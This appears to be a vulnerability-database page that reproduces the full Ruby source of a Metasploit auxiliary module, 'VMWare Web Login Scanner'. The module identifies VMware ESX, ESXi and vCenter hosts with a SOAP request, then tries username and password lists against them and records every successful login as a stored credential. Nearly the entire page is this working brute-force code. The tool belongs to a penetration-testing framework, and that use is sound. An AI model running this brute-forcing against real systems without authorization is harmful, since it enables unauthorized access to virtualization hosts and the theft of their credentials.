Lucene search
TheLightCosine <[email protected]>MSF:AUXILIARY-SCANNER-VMWARE-VMWARE_HTTP_LOGIN-
HistoryFeb 13, 2012 - 6:05 p.m.
VMWare Web Login Scanner

2012-02-1318:05:32
theLightCosine <[email protected]>
www.rapid7.com
JSON
This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::VIMSoap
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'VMWare Web Login Scanner',
      'Description'    => 'This module attempts to authenticate to the VMWare HTTP service
        for VmWare Server, ESX, and ESXI',
      'Author'         => ['theLightCosine'],
      'References'     =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'SSL' => true }
    )

    register_options(
      [
        OptString.new('URI', [true, "The default URI to login with", "/sdk"]),
        Opt::RPORT(443)
      ])
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: 'vmware',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def run_host(ip)
    return unless is_vmware?
    each_user_pass { |user, pass|
      result = vim_do_login(user, pass)
      case result
      when :success
        print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"
        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)
        return if datastore['STOP_ON_SUCCESS']
      when :fail
        print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"
      end
    }
  end

  # Mostly taken from the Apache Tomcat service validator
  def is_vmware?
    soap_data =
      %Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <env:Body>
      <RetrieveServiceContent xmlns="urn:vim25">
        <_this type="ServiceInstance">ServiceInstance</_this>
      </RetrieveServiceContent>
      </env:Body>
      </env:Envelope>|

    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI']),
      'method'  => 'POST',
      'agent'   => 'VMware VI Client',
      'data'    => soap_data
    }, 25)

    unless res
      vprint_error("#{rhost}:#{rport} Error: no response")
      return false
    end

    fingerprint_vmware(res)
  rescue ::Rex::ConnectionError => e
    vprint_error("#{rhost}:#{rport} Error: could not connect")
    return false
  rescue => e
    vprint_error("#{rhost}:#{rport} Error: #{e}")
    return false
  end

  def fingerprint_vmware(res)
    unless res
      vprint_error("#{rhost}:#{rport} Error: no response")
      return false
    end
    return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')

    os_match = res.body.match(/<name>([\w\s]+)<\/name>/)
    ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/)
    build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)
    full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)

    if full_match
      print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"
      report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])
    end

    unless os_match and ver_match and build_match
      vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare")
      return false
    end

    if os_match[1].include?('ESX') || os_match[1].include?('vCenter')
      # Report a fingerprint match for OS identification
      report_note(
        :host  => rhost,
        :ntype => 'fingerprint.match',
        :data  => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }
      )
      return true
    end
  end
end
JSON
Related for MSF:AUXILIARY-SCANNER-VMWARE-VMWARE_HTTP_LOGIN-
nessus153 metasploit23 saint4 openvas6 zdt2 packetstorm7 cvelist1 exploitdb2 cve1